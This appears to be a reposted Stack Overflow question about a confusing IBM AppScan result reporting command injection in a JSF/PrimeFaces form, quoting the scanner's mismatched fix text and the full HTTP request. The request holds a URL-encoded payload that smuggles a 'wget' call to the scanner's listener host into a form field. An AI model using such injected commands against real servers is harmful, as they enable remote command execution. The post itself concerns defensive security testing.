问题
Orginal Post IBM AppScan We recently received result from IBM AppScan DAST and some of the result don't make much senses.
Parameter: **javax.faces.source**
Risk(s): It is possible to run remote commands on the web server. This usually means complete compromise of the server and its contents
Fix: Set the "uri" attribute of the "domain" entity in the clientaccesspolicy.xml file to include specific domain names instead of any domain.
The following changes were applied to the original request:
Set the value of the parameter 'form:F_16275_1_input' to
'%22%7Cwget+http%3A%2F%2F--AppScanLocalIpAddress--%3A--AppScanLocalPortNum--%2FAppScanMsg.html%3Fv
arId%3D13314%7Cecho+%22
Request/Response:
POST /***/itemliststatus.xhtml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
Connection: keep-alive
Faces-Request: partial/ajax
X-Requested-With: XMLHttpRequest
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-
javax.faces.partial.ajax=true&javax.faces.source=form%3AbuttontextSearch&javax.faces.partial.execute=form&javax.faces.partial.render=j_idt17+unreadCountForm+j_idt22+menuform+messagingAppForm+form+formDialog&form%3AbuttontextSearch=form%3AbuttontextSearch&form=form&form%3AF_16275_0=12375541&form%3AF_16275_1_input=%22%7Cwget+http%3A%2F%2F********%3A55016%2FAppScanMsg.html%3FvarId%3D13314%7Cecho+%22&form%3AF_16275_2_input=&form%3AF_16275_3_input=&form%3AF_16275_4_input=&form%3AF_16275_5_focus=&form%3AF_16275_5_input=&form
来源:https://stackoverflow.com/questions/61705693/ibm-appscan-port-listener-command-injection-jsf-2-2-primefaces-jboss-7-2